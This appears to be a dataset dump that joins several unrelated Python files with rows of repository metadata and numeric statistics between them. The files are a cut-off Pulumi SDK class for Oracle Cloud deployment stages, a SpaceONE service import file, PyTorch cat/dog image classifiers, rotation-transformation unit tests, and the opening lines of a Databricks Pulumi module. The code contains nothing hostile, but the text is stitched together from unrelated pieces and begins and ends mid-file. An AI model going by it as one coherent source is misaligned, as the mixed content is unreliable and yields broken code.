:param pulumi.Input[str] state: The current state of the deployment stage.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] time_created: Time the deployment stage was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] time_updated: Time the deployment stage was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
:param pulumi.Input[pulumi.InputType['DeployStageWaitCriteriaArgs']] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeployStageState.__new__(_DeployStageState)
__props__.__dict__["approval_policy"] = approval_policy
__props__.__dict__["blue_backend_ips"] = blue_backend_ips
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["compute_instance_group_deploy_environment_id"] = compute_instance_group_deploy_environment_id
__props__.__dict__["config"] = config
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deploy_artifact_id"] = deploy_artifact_id
__props__.__dict__["deploy_artifact_ids"] = deploy_artifact_ids
__props__.__dict__["deploy_pipeline_id"] = deploy_pipeline_id
__props__.__dict__["deploy_stage_predecessor_collection"] = deploy_stage_predecessor_collection
__props__.__dict__["deploy_stage_type"] = deploy_stage_type
__props__.__dict__["deployment_spec_deploy_artifact_id"] = deployment_spec_deploy_artifact_id
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["docker_image_deploy_artifact_id"] = docker_image_deploy_artifact_id
__props__.__dict__["failure_policy"] = failure_policy
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["function_deploy_environment_id"] = function_deploy_environment_id
__props__.__dict__["function_timeout_in_seconds"] = function_timeout_in_seconds
__props__.__dict__["green_backend_ips"] = green_backend_ips
__props__.__dict__["is_async"] = is_async
__props__.__dict__["is_validation_enabled"] = is_validation_enabled
__props__.__dict__["kubernetes_manifest_deploy_artifact_ids"] = kubernetes_manifest_deploy_artifact_ids
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["load_balancer_config"] = load_balancer_config
__props__.__dict__["max_memory_in_mbs"] = max_memory_in_mbs
__props__.__dict__["namespace"] = namespace
__props__.__dict__["oke_cluster_deploy_environment_id"] = oke_cluster_deploy_environment_id
__props__.__dict__["project_id"] = project_id
__props__.__dict__["rollback_policy"] = rollback_policy
__props__.__dict__["rollout_policy"] = rollout_policy
__props__.__dict__["state"] = state
__props__.__dict__["system_tags"] = system_tags
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
__props__.__dict__["traffic_shift_target"] = traffic_shift_target
__props__.__dict__["wait_criteria"] = wait_criteria
return DeployStage(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="approvalPolicy")
def approval_policy(self) -> pulumi.Output['outputs.DeployStageApprovalPolicy']:
"""
(Updatable) Specifies the approval policy.
"""
return pulumi.get(self, "approval_policy")
@property
@pulumi.getter(name="blueBackendIps")
def blue_backend_ips(self) -> pulumi.Output['outputs.DeployStageBlueBackendIps']:
"""
(Updatable) Collection of backend environment IP addresses.
"""
return pulumi.get(self, "blue_backend_ips")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="computeInstanceGroupDeployEnvironmentId")
def compute_instance_group_deploy_environment_id(self) -> pulumi.Output[str]:
"""
(Updatable) A compute instance group environment OCID for rolling deployment.
"""
return pulumi.get(self, "compute_instance_group_deploy_environment_id")
@property
@pulumi.getter
def config(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
(Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
"""
return pulumi.get(self, "config")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="deployArtifactId")
def deploy_artifact_id(self) -> pulumi.Output[Optional[str]]:
"""
(Updatable) Optional binary artifact OCID user may provide to this stage.
"""
return pulumi.get(self, "deploy_artifact_id")
@property
@pulumi.getter(name="deployArtifactIds")
def deploy_artifact_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
(Updatable) Additional file artifact OCIDs.
"""
return pulumi.get(self, "deploy_artifact_ids")
@property
@pulumi.getter(name="deployPipelineId")
def deploy_pipeline_id(self) -> pulumi.Output[str]:
"""
The OCID of a pipeline.
"""
return pulumi.get(self, "deploy_pipeline_id")
@property
@pulumi.getter(name="deployStagePredecessorCollection")
def deploy_stage_predecessor_collection(self) -> pulumi.Output['outputs.DeployStageDeployStagePredecessorCollection']:
"""
(Updatable) Collection containing the predecessors of a stage.
"""
return pulumi.get(self, "deploy_stage_predecessor_collection")
@property
@pulumi.getter(name="deployStageType")
def deploy_stage_type(self) -> pulumi.Output[str]:
"""
(Updatable) Deployment stage type.
"""
return pulumi.get(self, "deploy_stage_type")
@property
@pulumi.getter(name="deploymentSpecDeployArtifactId")
def deployment_spec_deploy_artifact_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the artifact that contains the deployment specification.
"""
return pulumi.get(self, "deployment_spec_deploy_artifact_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
(Updatable) Optional description about the deployment stage.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="dockerImageDeployArtifactId")
def docker_image_deploy_artifact_id(self) -> pulumi.Output[str]:
"""
(Updatable) A Docker image artifact OCID.
"""
return pulumi.get(self, "docker_image_deploy_artifact_id")
@property
@pulumi.getter(name="failurePolicy")
def failure_policy(self) -> pulumi.Output['outputs.DeployStageFailurePolicy']:
"""
(Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
"""
return pulumi.get(self, "failure_policy")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="functionDeployEnvironmentId")
def function_deploy_environment_id(self) -> pulumi.Output[str]:
"""
(Updatable) Function environment OCID.
"""
return pulumi.get(self, "function_deploy_environment_id")
@property
@pulumi.getter(name="functionTimeoutInSeconds")
def function_timeout_in_seconds(self) -> pulumi.Output[int]:
"""
(Updatable) Timeout for execution of the Function. Value in seconds.
"""
return pulumi.get(self, "function_timeout_in_seconds")
@property
@pulumi.getter(name="greenBackendIps")
def green_backend_ips(self) -> pulumi.Output['outputs.DeployStageGreenBackendIps']:
"""
(Updatable) Collection of backend environment IP addresses.
"""
return pulumi.get(self, "green_backend_ips")
@property
@pulumi.getter(name="isAsync")
def is_async(self) -> pulumi.Output[bool]:
"""
(Updatable) A boolean flag specifies whether this stage executes asynchronously.
"""
return pulumi.get(self, "is_async")
@property
@pulumi.getter(name="isValidationEnabled")
def is_validation_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) A boolean flag specifies whether the invoked function should be validated.
"""
return pulumi.get(self, "is_validation_enabled")
@property
@pulumi.getter(name="kubernetesManifestDeployArtifactIds")
def kubernetes_manifest_deploy_artifact_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
(Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
"""
return pulumi.get(self, "kubernetes_manifest_deploy_artifact_ids")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="loadBalancerConfig")
def load_balancer_config(self) -> pulumi.Output['outputs.DeployStageLoadBalancerConfig']:
"""
(Updatable) Specifies config for load balancer traffic shift stages.
"""
return pulumi.get(self, "load_balancer_config")
@property
@pulumi.getter(name="maxMemoryInMbs")
def max_memory_in_mbs(self) -> pulumi.Output[str]:
"""
(Updatable) Maximum usable memory for the Function (in MB).
"""
return pulumi.get(self, "max_memory_in_mbs")
@property
@pulumi.getter
def namespace(self) -> pulumi.Output[str]:
"""
(Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="okeClusterDeployEnvironmentId")
def oke_cluster_deploy_environment_id(self) -> pulumi.Output[str]:
"""
(Updatable) Kubernetes cluster environment OCID for deployment.
"""
return pulumi.get(self, "oke_cluster_deploy_environment_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="rollbackPolicy")
def rollback_policy(self) -> pulumi.Output['outputs.DeployStageRollbackPolicy']:
"""
(Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
"""
return pulumi.get(self, "rollback_policy")
@property
@pulumi.getter(name="rolloutPolicy")
def rollout_policy(self) -> pulumi.Output['outputs.DeployStageRolloutPolicy']:
"""
(Updatable) Description of rollout policy for load balancer traffic shift stage.
"""
return pulumi.get(self, "rollout_policy")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the deployment stage.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
"""
return pulumi.get(self, "system_tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
Time the deployment stage was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
Time the deployment stage was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_updated")
@property
@pulumi.getter(name="trafficShiftTarget")
def traffic_shift_target(self) -> pulumi.Output[str]:
"""
(Updatable) Specifies the target or destination backend set.
"""
return pulumi.get(self, "traffic_shift_target")
@property
@pulumi.getter(name="waitCriteria")
def wait_criteria(self) -> pulumi.Output['outputs.DeployStageWaitCriteria']:
"""
(Updatable) Specifies wait criteria for the Wait stage.
"""
return pulumi.get(self, "wait_criteria")
| 55.647497
| 324
| 0.701175
| 11,787
| 104,506
| 5.918385
| 0.03173
| 0.07285
| 0.078713
| 0.042575
| 0.963518
| 0.953584
| 0.949498
| 0.94613
| 0.942489
| 0.924584
| 0
| 0.000777
| 0.199625
| 104,506
| 1,877
| 325
| 55.677144
| 0.833234
| 0.357635
| 0
| 0.847764
| 1
| 0
| 0.172856
| 0.100899
| 0
| 0
| 0
| 0
| 0
| 1
| 0.169363
| false
| 0.000951
| 0.00666
| 0
| 0.278782
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
596b4b9e69b45f0af8522509673a7b2d1e08f869
| 141
|
py
|
Python
|
src/spaceone/secret/service/__init__.py
|
ku524/secret
|
c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1
|
[
"Apache-2.0"
] | 7
|
2020-06-04T23:01:12.000Z
|
2021-01-31T08:41:29.000Z
|
src/spaceone/secret/service/__init__.py
|
ku524/secret
|
c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1
|
[
"Apache-2.0"
] | 2
|
2020-08-05T13:31:53.000Z
|
2021-03-07T15:15:14.000Z
|
src/spaceone/secret/service/__init__.py
|
ku524/secret
|
c5dad49f40ab1cbbaa0b8f01222de10ae73d1fb1
|
[
"Apache-2.0"
] | 6
|
2020-06-10T01:59:35.000Z
|
2021-11-25T06:30:35.000Z
|
from spaceone.secret.service.secret_service import SecretService
from spaceone.secret.service.secret_group_service import SecretGroupService
| 47
| 75
| 0.900709
| 17
| 141
| 7.294118
| 0.470588
| 0.314516
| 0.290323
| 0.403226
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056738
| 141
| 2
| 76
| 70.5
| 0.932331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ab9564cb3f618f9aa7e851b6a19592c683cd2eed
| 11,812
|
py
|
Python
|
Classification/src/network.py
|
Natural-Goldfish/CatDogClassification
|
5ae0fe8bc37c6ee8a1cd3bd75cc862c650822263
|
[
"CECILL-B"
] | null | null | null |
Classification/src/network.py
|
Natural-Goldfish/CatDogClassification
|
5ae0fe8bc37c6ee8a1cd3bd75cc862c650822263
|
[
"CECILL-B"
] | null | null | null |
Classification/src/network.py
|
Natural-Goldfish/CatDogClassification
|
5ae0fe8bc37c6ee8a1cd3bd75cc862c650822263
|
[
"CECILL-B"
] | null | null | null |
import torch
from torchvision.models import vgg16
class CatDogClassifier_2l(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer1 = torch.nn.Sequential(
torch.nn.Conv2d(3, 32, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool1 = torch.nn.MaxPool2d(2, stride = 2)
self.layer2 = torch.nn.Sequential(
torch.nn.Conv2d(32, 64, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool2 = torch.nn.MaxPool2d(2, stride = 2)
self.classify = torch.nn.Sequential(
torch.nn.Linear(64*28*28, 4096),
torch.nn.ReLU(inplace=True),
torch.nn.Dropout(0.5),
torch.nn.Linear(4096, 1024),
torch.nn.ReLU(inplace=True),
torch.nn.Linear(1024, 2)
)
def forward(self, x):
output = self.layer1(x)
output = self.max_pool1(output)
output = self.layer2(output)
output = self.max_pool2(output)
output = output.view(-1, 64*28*28)
output = self.classify(output)
return output
class CatDogClassifier_3l(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer1 = torch.nn.Sequential(
torch.nn.Conv2d(3, 32, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool1 = torch.nn.MaxPool2d(2, stride = 2)
self.layer2 = torch.nn.Sequential(
torch.nn.Conv2d(32, 64, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool2 = torch.nn.MaxPool2d(2, stride = 2)
self.layer3 = torch.nn.Sequential(
torch.nn.Conv2d(64, 128, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool3 = torch.nn.MaxPool2d(2, stride = 2)
self.classify = torch.nn.Sequential(
torch.nn.Linear(128*14*14, 4096),
torch.nn.ReLU(inplace=True),
torch.nn.Dropout(0.5),
torch.nn.Linear(4096, 1024),
torch.nn.ReLU(inplace=True),
torch.nn.Linear(1024, 2)
)
def forward(self, x):
output = self.layer1(x)
output = self.max_pool1(output)
output = self.layer2(output)
output = self.max_pool2(output)
output = self.layer3(output)
output = self.max_pool3(output)
output = output.view(-1, 128*14*14)
output = self.classify(output)
return output
class CatDogClassifier_4l(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer1 = torch.nn.Sequential(
torch.nn.Conv2d(3, 32, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool1 = torch.nn.MaxPool2d(2, stride = 2)
self.layer2 = torch.nn.Sequential(
torch.nn.Conv2d(32, 64, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool2 = torch.nn.MaxPool2d(2, stride = 2)
self.layer3 = torch.nn.Sequential(
torch.nn.Conv2d(64, 128, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool3 = torch.nn.MaxPool2d(2, stride = 2)
self.layer4 = torch.nn.Sequential(
torch.nn.Conv2d(128, 256, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool4 = torch.nn.MaxPool2d(2, stride = 2)
self.classify = torch.nn.Sequential(
torch.nn.Linear(256*7*7, 4096),
torch.nn.ReLU(inplace=True),
torch.nn.Dropout(0.5),
torch.nn.Linear(4096, 1024),
torch.nn.ReLU(inplace=True),
torch.nn.Linear(1024, 2)
)
def forward(self, x):
output = self.layer1(x)
output = self.max_pool1(output)
output = self.layer2(output)
output = self.max_pool2(output)
output = self.layer3(output)
output = self.max_pool3(output)
output = self.layer4(output)
output = self.max_pool4(output)
output = output.view(-1, 256*7*7)
output = self.classify(output)
return output
class CatDogClassifier_6l(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer1 = torch.nn.Sequential(
torch.nn.Conv2d(3, 32, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool1 = torch.nn.MaxPool2d(2, stride = 2)
self.layer2 = torch.nn.Sequential(
torch.nn.Conv2d(32, 64, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool2 = torch.nn.MaxPool2d(2, stride = 2)
self.layer3 = torch.nn.Sequential(
torch.nn.Conv2d(64, 128, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool3 = torch.nn.MaxPool2d(2, stride = 2)
self.layer4 = torch.nn.Sequential(
torch.nn.Conv2d(128, 256, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool4 = torch.nn.MaxPool2d(2, stride = 2)
self.layer5 = torch.nn.Sequential(
torch.nn.Conv2d(256, 512, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool5 = torch.nn.MaxPool2d(2, stride = 2)
self.layer6 = torch.nn.Sequential(
torch.nn.Conv2d(512, 1024, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool6 = torch.nn.MaxPool2d(2, stride = 2)
self.classify = torch.nn.Sequential(
torch.nn.Linear(1024*1*1, 4096),
torch.nn.ReLU(inplace=True),
torch.nn.Dropout(0.5),
torch.nn.Linear(4096, 1024),
torch.nn.ReLU(inplace=True),
torch.nn.Linear(1024, 2)
)
def forward(self, x):
output = self.layer1(x)
output = self.max_pool1(output)
output = self.layer2(output)
output = self.max_pool2(output)
output = self.layer3(output)
output = self.max_pool3(output)
output = self.layer4(output)
output = self.max_pool4(output)
output = self.layer5(output)
output = self.max_pool5(output)
output = self.layer6(output)
output = self.max_pool6(output)
output = output.view(-1, 1024*1*1)
output = self.classify(output)
return output
class CatDogClassifier_5l(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer1 = torch.nn.Sequential(
torch.nn.Conv2d(3, 32, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool1 = torch.nn.MaxPool2d(2, stride = 2)
self.layer2 = torch.nn.Sequential(
torch.nn.Conv2d(32, 64, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool2 = torch.nn.MaxPool2d(2, stride = 2)
self.layer3 = torch.nn.Sequential(
torch.nn.Conv2d(64, 128, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool3 = torch.nn.MaxPool2d(2, stride = 2)
self.layer4 = torch.nn.Sequential(
torch.nn.Conv2d(128, 256, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool4 = torch.nn.MaxPool2d(2, stride = 2)
self.layer5 = torch.nn.Sequential(
torch.nn.Conv2d(256, 512, 3, 1, 1, bias = False),
torch.nn.ReLU(inplace=True)
)
self.max_pool5 = torch.nn.MaxPool2d(2, stride = 2)
self.classify = torch.nn.Sequential(
torch.nn.Linear(512*3*3, 4096),
torch.nn.ReLU(inplace=True),
torch.nn.Dropout(0.5),
torch.nn.Linear(4096, 1024),
torch.nn.ReLU(inplace=True),
torch.nn.Linear(1024, 2)
)
def forward(self, x):
output = self.layer1(x)
output = self.max_pool1(output)
output = self.layer2(output)
output = self.max_pool2(output)
output = self.layer3(output)
output = self.max_pool3(output)
output = self.layer4(output)
output = self.max_pool4(output)
output = self.layer5(output)
output = self.max_pool5(output)
output = output.view(-1, 512*3*3)
output = self.classify(output)
return output
class CatDogClassifier_5l_bn(torch.nn.Module):
def __init__(self):
super().__init__()
self.layer1 = torch.nn.Sequential(
torch.nn.Conv2d(3, 32, 3, 1, 1, bias = False),
torch.nn.BatchNorm2d(32),
torch.nn.ReLU(inplace=True)
)
self.max_pool1 = torch.nn.MaxPool2d(2, stride = 2)
self.layer2 = torch.nn.Sequential(
torch.nn.Conv2d(32, 64, 3, 1, 1, bias = False),
torch.nn.BatchNorm2d(64),
torch.nn.ReLU(inplace=True)
)
self.max_pool2 = torch.nn.MaxPool2d(2, stride = 2)
self.layer3 = torch.nn.Sequential(
torch.nn.Conv2d(64, 128, 3, 1, 1, bias = False),
torch.nn.BatchNorm2d(128),
torch.nn.ReLU(inplace=True)
)
self.max_pool3 = torch.nn.MaxPool2d(2, stride = 2)
self.layer4 = torch.nn.Sequential(
torch.nn.Conv2d(128, 256, 3, 1, 1, bias = False),
torch.nn.BatchNorm2d(256),
torch.nn.ReLU(inplace=True)
)
self.max_pool4 = torch.nn.MaxPool2d(2, stride = 2)
self.layer5 = torch.nn.Sequential(
torch.nn.Conv2d(256, 512, 3, 1, 1, bias = False),
torch.nn.BatchNorm2d(512),
torch.nn.ReLU(inplace=True)
)
self.max_pool5 = torch.nn.MaxPool2d(2, stride = 2)
self.classify = torch.nn.Sequential(
torch.nn.Linear(512*3*3, 4096),
torch.nn.ReLU(inplace=True),
torch.nn.Dropout(0.5),
torch.nn.Linear(4096, 1024),
torch.nn.ReLU(inplace=True),
torch.nn.Linear(1024, 2)
)
def forward(self, x):
output = self.layer1(x)
output = self.max_pool1(output)
output = self.layer2(output)
output = self.max_pool2(output)
output = self.layer3(output)
output = self.max_pool3(output)
output = self.layer4(output)
output = self.max_pool4(output)
output = self.layer5(output)
output = self.max_pool5(output)
output = output.view(-1, 512*3*3)
output = self.classify(output)
return output
class Vgg16(torch.nn.Module):
def __init__(self):
super().__init__()
self.vgg16 = vgg16(pretrained= True)
self.set_parameter_requires_grad(self.vgg16, True)
self.classifier = torch.nn.Sequential(
torch.nn.Linear(512*7*7, 4096, bias = True),
torch.nn.ReLU(inplace=True),
torch.nn.Dropout(0.5),
torch.nn.Linear(4096, 1024, bias = True),
torch.nn.ReLU(inplace=True),
torch.nn.Linear(1024, 2)
)
self.vgg16.classifier = self.classifier
def set_parameter_requires_grad(self, model, feature_extracting):
if feature_extracting:
for param in model.parameters():
param.requires_grad = False
def forward(self, x):
output = self.vgg16(x)
return output
| 34.040346
| 70
| 0.542922
| 1,468
| 11,812
| 4.285422
| 0.054496
| 0.179145
| 0.068193
| 0.111588
| 0.937848
| 0.920045
| 0.911302
| 0.906056
| 0.870132
| 0.849467
| 0
| 0.080985
| 0.329919
| 11,812
| 346
| 71
| 34.138728
| 0.713834
| 0
| 0
| 0.761092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051195
| false
| 0
| 0.006826
| 0
| 0.105802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
abb21f0598f4370e247dd3997382a655755233fb
| 3,672
|
py
|
Python
|
tests/relaxations/test_rotation.py
|
eth-sri/3dcertify
|
bb10f339f80149a9ebc7c07d041b2ef222efb394
|
[
"Apache-2.0"
] | 9
|
2021-03-31T20:27:50.000Z
|
2022-01-07T21:52:47.000Z
|
tests/relaxations/test_rotation.py
|
eth-sri/3dcertify
|
bb10f339f80149a9ebc7c07d041b2ef222efb394
|
[
"Apache-2.0"
] | 2
|
2021-06-21T15:38:07.000Z
|
2021-11-08T09:10:09.000Z
|
tests/relaxations/test_rotation.py
|
eth-sri/3dcertify
|
bb10f339f80149a9ebc7c07d041b2ef222efb394
|
[
"Apache-2.0"
] | 4
|
2021-07-17T15:04:14.000Z
|
2022-02-09T17:51:39.000Z
|
import unittest
from functools import partial
import numpy as np
from parameterized import parameterized
from scipy.spatial.transform import Rotation
from relaxations import taylor
from tests.RelaxationTestCase import RelaxationTestCase, sample_points, sample_params
from transformations.rotation import RotationZ, RotationX, RotationY
from util.rotation import rotate_z
class TestRotationX(RelaxationTestCase):
@parameterized.expand(zip(
sample_points(),
np.random.uniform(-10, 10, (100, 1))
))
def test_transformation_float(self, x, alpha):
rotation = Rotation.from_euler('x', alpha.item())
expected = x.dot(rotation.as_matrix().T)
transformation = RotationX()
actual = transformation.transform(x, alpha)
self.assertAlmostEqualNumpy(expected, actual)
@parameterized.expand(zip(
sample_points(),
sample_params(num_params=1)
))
def test_transformation_interval(self, x, params):
transformation = RotationX()
actual = transformation.transform(x, params)
self.assertSound(actual, params, partial(transformation.transform, x))
@parameterized.expand(zip(
sample_points(),
sample_params(num_params=1)
))
def test_transformation_taylor(self, x, params):
transformation = RotationX()
actual = taylor.encode(transformation, x, params)
self.assertSound(actual, params, partial(transformation.transform, x))
class TestRotationY(RelaxationTestCase):
@parameterized.expand(zip(
sample_points(),
np.random.uniform(-10, 10, (100, 1))
))
def test_transformation_float(self, x, alpha):
rotation = Rotation.from_euler('y', alpha.item())
expected = x.dot(rotation.as_matrix().T)
transformation = RotationY()
actual = transformation.transform(x, alpha)
self.assertAlmostEqualNumpy(expected, actual)
@parameterized.expand(zip(
sample_points(),
sample_params(num_params=1)
))
def test_transformation_interval(self, x, params):
transformation = RotationY()
actual = transformation.transform(x, params)
self.assertSound(actual, params, partial(transformation.transform, x))
@parameterized.expand(zip(
sample_points(),
sample_params(num_params=1)
))
def test_transformation_taylor(self, x, params):
transformation = RotationY()
actual = taylor.encode(transformation, x, params)
self.assertSound(actual, params, partial(transformation.transform, x))
class TestRotationZ(RelaxationTestCase):
@parameterized.expand(zip(
sample_points(),
np.random.uniform(-10, 10, (100, 1))
))
def test_transformation_float(self, x, alpha):
transformation = RotationZ()
expected = rotate_z(x, alpha.item())
actual = transformation.transform(x, alpha)
self.assertAlmostEqualNumpy(expected, actual)
@parameterized.expand(zip(
sample_points(),
sample_params(num_params=1)
))
def test_transformation_interval(self, x, params):
transformation = RotationZ()
actual = transformation.transform(x, params)
self.assertSound(actual, params, partial(transformation.transform, x))
@parameterized.expand(zip(
sample_points(),
sample_params(num_params=1)
))
def test_transformation_taylor(self, x, params):
transformation = RotationZ()
actual = taylor.encode(transformation, x, params)
self.assertSound(actual, params, partial(transformation.transform, x))
if __name__ == '__main__':
unittest.main()
| 33.081081
| 85
| 0.684368
| 379
| 3,672
| 6.485488
| 0.16095
| 0.112286
| 0.117168
| 0.102522
| 0.822213
| 0.822213
| 0.792921
| 0.792921
| 0.792921
| 0.792921
| 0
| 0.010356
| 0.211057
| 3,672
| 110
| 86
| 33.381818
| 0.838108
| 0
| 0
| 0.813187
| 0
| 0
| 0.002723
| 0
| 0
| 0
| 0
| 0
| 0.098901
| 1
| 0.098901
| false
| 0
| 0.098901
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9f29cae875c319e09db053a906315e476c03fba
| 17,346
|
py
|
Python
|
sdk/python/pulumi_databricks/storage_credential.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/storage_credential.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/storage_credential.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
